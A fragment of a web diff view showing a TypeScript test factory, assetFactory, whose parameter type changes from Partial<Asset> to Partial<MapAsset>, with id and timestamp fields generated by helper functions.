||||||
|
|
||||||
const assetFactory = (asset: Partial<Asset> = {}) => ({
|
const assetFactory = (asset: Partial<MapAsset> = {}) => ({
|
||||||
id: newUuid(),
|
id: newUuid(),
|
||||||
createdAt: newDate(),
|
createdAt: newDate(),
|
||||||
updatedAt: newDate(),
|
updatedAt: newDate(),
|
||||||
|
Loading…
x
Reference in New Issue
Block a user